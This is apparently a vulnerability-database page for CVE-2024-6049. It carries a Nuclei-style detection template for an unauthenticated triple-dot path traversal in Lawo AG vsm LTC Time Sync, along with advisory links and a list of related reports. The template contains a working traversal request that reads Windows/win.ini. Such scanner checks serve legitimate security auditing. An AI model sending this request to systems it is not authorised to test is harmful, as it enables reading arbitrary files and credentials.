| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
| CVE-2024-6049 | 24 Oct 202410:57 | – | circl | |
| Lawo AG vsm LTC Time Sync 路径遍历漏洞 | 24 Oct 202400:00 | – | cnnvd | |
| CVE-2024-6049 | 24 Oct 202407:47 | – | cve | |
| CVE-2024-6049 Unauthenticated Path Traversal | 24 Oct 202407:47 | – | cvelist | |
| CVE-2024-6049 | 24 Oct 202408:15 | – | nvd | |
| Generic HTTP Directory Traversal / File Inclusion (Web Root) - Active Check | 18 Apr 201700:00 | – | openvas | |
| Lawo AG vsm LTC Time Sync Path Traversal | 25 Oct 202400:00 | – | packetstorm | |
| CVE-2024-6049 | 23 May 202508:02 | – | redhatcve | |
| CVE-2024-6049 Unauthenticated Path Traversal | 24 Oct 202407:47 | – | vulnrichment |
id: CVE-2024-6049
info:
name: Lawo AG vsm LTC Time Sync (vTimeSync) - Path Traversal
author: s4e-io
severity: high
description: |
The web server of Lawo AG vsm LTC Time Sync (vTimeSync) is affected by a "..." (triple dot) path traversal vulnerability. By sending a specially crafted HTTP request, an unauthenticated remote attacker could download arbitrary files from the operating system. As a limitation, the exploitation is only possible if the requested file has some file extension, e. g. .exe or .txt.
impact: |
Unauthenticated attackers can exploit triple dot path traversal to download arbitrary files from the operating system, potentially exposing configuration files and credentials.
remediation: |
Update Lawo AG vsm LTC Time Sync (vTimeSync) to the latest version that addresses the path traversal vulnerability.
reference:
- https://lawo.com/lawo-downloads/
- https://r.sec-consult.com/lawo
- https://packetstormsecurity.com/files/182347/Lawo-AG-vsm-LTC-Time-Sync-Path-Traversal.html
- https://sec-consult.com/vulnerability-lab/advisory/unauthenticated-path-traversal-vulnerability-in-lawo-ag-vsm-ltc-time-sync-vtimesync/
- https://nvd.nist.gov/vuln/detail/cve-2024-6049
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2024-6049
cwe-id: CWE-32
epss-score: 0.04325
epss-percentile: 0.89997
metadata:
max-request: 2
tags: cve,cve2024,lawo,vtimesync,lfi,vuln
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}
host-redirects: true
matchers:
- type: word
part: body
words:
- "vTimeSync"
- "Lawo"
internal: true
case-insensitive: true
- raw:
- |
GET /.../.../.../.../.../.../.../.../.../Windows/win.ini HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains_all(body, "bit app support", "fonts", "extensions")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022100c4fbaaf1b275359dbebb258caae8601aebd3eb11d826c724f63f3a1f419f4d32022024d1ad237c51c7406f21421f70a99f90d5f04cdb9f94ae4e7e9805fb1c1b678b:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation